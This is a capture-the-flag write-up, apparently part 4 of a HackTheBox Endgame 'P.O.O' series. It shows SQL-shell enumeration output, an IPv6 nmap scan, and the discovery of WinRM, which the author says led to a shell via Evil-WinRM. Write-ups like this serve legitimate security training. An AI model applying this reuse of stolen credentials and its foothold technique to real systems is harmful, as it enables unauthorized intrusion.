HackTheBox P.O.O Writeup Series:
- PART 1: HackTheBox Endgame P.O.O Writeup Part 1 – Recon (Flag 01/05)
- PART 2: HackTheBox Endgame P.O.O Writeup Part 2 – Huh?! (Flag 02/05)
- PART 3: HackTheBox Endgame P.O.O Writeup Part 3 – BackTrack (Flag 03/05)
- PART 4: HackTheBox Endgame P.O.O Writeup Part 4 – Foothold (Flag 04/05)
- PART 5: p00ned (Coming soon)
The 4th Flag of P.O.O was a bit complicated and time-consuming because I had no idea what to do, I tried Evil WinRM, DCSync, a lot of Impacket tools to gain foothold, all my efforts are in vain.
But as always a simple and straight to the point nudge from a good HTB fellow user made me understand what I supposed to try. I was going in a wrong direction. So here is the writeup of POO Part 5: Foothold.





As I already have Administrator credentials from my previous flag, I tried to log in as Administrator from the SQL Shell python script, I was able to login successfully and get the shell – but the Administrator is a public user with limited access.





I ran couple of commands to find users in the box, Administrator privilages etc.
# root @ ns09 in ~/htb/poo [14:52:36]
$ python SQL-Explt.py
Successful login: intranet.poo\Administrator@10.13.38.11
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> net user Administrator
User name Administrator
Full Name
Comment Built-in account for administering the computer/domain
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/4/2018 11:27:10 AM
Password expires Never
Password changeable 4/5/2018 11:27:10 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/6/2020 1:52:59 PM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> whoami /all
USER INFORMATION
----------------
User Name SID
=========================== =============================================================
nt service\mssql$poo_public S-1-5-80-4078066653-3512796471-551061035-3947311196-544738325
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Monitor Users Alias S-1-5-32-558 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT SERVICE\ALL SERVICES Well-known group S-1-5-80-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> net users
User accounts for \\COMPATIBILITY
-------------------------------------------------------------------------------
Administrator DefaultAccount doobie
doobie2 Guest POO_PUBLIC00
POO_PUBLIC01 POO_PUBLIC02 POO_PUBLIC03
POO_PUBLIC04 POO_PUBLIC05 POO_PUBLIC06
POO_PUBLIC07 POO_PUBLIC08 POO_PUBLIC09
POO_PUBLIC10 POO_PUBLIC11 POO_PUBLIC12
POO_PUBLIC13 POO_PUBLIC14 POO_PUBLIC15
POO_PUBLIC16 POO_PUBLIC17 POO_PUBLIC18
POO_PUBLIC19 POO_PUBLIC20 script
WDAGUtilityAccount
The command completed successfully.
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32>
At this moment, I’m again clue-less. The Administrator seemed useless for the first time. But, for my surprise, an unintended “ipconfig /all” showed me the machine’s network is configured with preferred IPv6 – dead:babe::1001. The DNS is pointing to “172.20.128.53”. I tried to ping Google DNS 8.8.8.8 it failed. My ping to 172.20.128.53 was successful.
# root @ ns09 in ~/htb/poo [15:07:21]
$ python SQL-Explt.py
Successful login: intranet.poo\Administrator@10.13.38.11
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : COMPATIBILITY
Primary Dns Suffix . . . . . . . : intranet.poo
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : intranet.poo
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
Physical Address. . . . . . . . . : 00-50-56-B9-76-07
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : dead:babe::1001(Preferred)
Link-local IPv6 Address . . . . . : fe80::20ca:ccce:396f:dba1%11(Preferred)
IPv4 Address. . . . . . . . . . . : 10.13.38.11(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : dead:babe::1
10.13.38.2
DNS Servers . . . . . . . . . . . : dead:babe::1
10.13.38.2
NetBIOS over Tcpip. . . . . . . . : Disabled
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2
Physical Address. . . . . . . . . : 00-50-56-B9-D9-FF
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 172.20.128.101(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . : 172.20.128.53
NetBIOS over Tcpip. . . . . . . . : Disabled
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32>
So now I know the IPv6 of the machine I decided to scan the services or open ports.
# root @ ns09 in ~ [15:29:04]
$ nmap -6 -p- -T4 -A -v dead:babe::1001
Scanning dead:babe::1001 [65535 ports]
Discovered open port 80/tcp on dead:babe::1001
Discovered open port 5985/tcp on dead:babe::1001
Discovered open port 1433/tcp on dead:babe::1001
Nmap scan report for dead:babe::1001
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
|_http-title: Bad Request
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
| ms-sql-ntlm-info:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-02-25T19:31:30
| Not valid after: 2050-02-25T19:31:30
| MD5: 10bc d953 87a6 26e9 9eff 885a 4919 425d
|_SHA-1: ac12 0344 6313 bbf4 502c 1984 56a7 deeb 3b9f 5320
|_ssl-date: 2020-03-06T12:35:23+00:00; +7s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
No OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=6%D=3/6%OT=80%CT=%CU=%PV=N%DS=1%DC=D%G=Y%TM=5E624384%P=x8
OS:6_64-pc-linux-gnu)S1(P=600e3b750020067fXX{32}0050a7b8c45a6204d58a27fe80
OS:12ffff50ab0000020405390103030801010402%ST=0.07778%RT=0.272633)S2(P=6008
OS:06730020067fXX{32}0050a7b90af90be6d58a27ff8012ffff602900000204053901030
OS:30801010402%ST=0.178774%RT=0.347316)S3(P=60067b20001c067fXX{32}0050a7ba
OS:bdad2deed58a28007012ffffa07100000204053901030308%ST=0.277737%RT=0.45156
OS:6)S4(P=600ffefb0020067fXX{32}0050a7bb0924a5fcd58a28018012ffffc7e3000002
OS:0405390103030801010402%ST=0.377846%RT=0.552361)S5(P=600d7a440020067fXX{
OS:32}0050a7bcd54f3488d58a28028012ffff6d2a0000020405390103030801010402%ST=
OS:0.478352%RT=0.644463)S6(P=6007ef2c001c067fXX{32}0050a7bd5514f4b0d58a280
OS:37012fc9444b500000204053901010402%ST=0.578091%RT=0.748078)IE1(P=6000{4}
OS:803a7fXX{32}81007f97abcd00{122}%ST=0.602311%RT=0.793024)TECN(P=602359ba
OS:0020067fXX{32}0050a7becf3d00d5d58a28048052ffffa6ab000002040539010303080
OS:1010402%ST=0.807169%RT=0.980875)EXTRA(FL=12345)
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6s, deviation: 0s, median: 6s
| ms-sql-info:
| dead:babe::1001:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
TRACEROUTE
HOP RTT ADDRESS
1 185.30 ms dead:babe::1001
Nmap done: 1 IP address (1 host up) scanned in 368.44 seconds
Raw packets sent: 131344 (8.408MB) | Rcvd: 230 (14.704KB)
# root @ ns09 in ~ [15:35:16]
$
Well, well, well, I found what I was looking for. The WinRM is running on the port 5985. In the next step I updated my hosts file with newly found IPv6 and used Evil-WinRM to get PowerShell shell.





That’s all folks, Thanks for reading. See you soon with the last part “p00ned”.
[…] Previous Post Previous post: HackTheBox Endgame P.O.O Writeup Part 2 – Huh?! (Flag 02/05)Next Post Next post: HackTheBox Endgame P.O.O Writeup Part 4 – Foothold (Flag 04/05) […]
[…] HackTheBox Endgame P.O.O Writeup Part 4 – Foothold (Flag 04/05) […]
[…] HackTheBox Endgame P.O.O Writeup Part 4 – Foothold (Flag 04/05) […]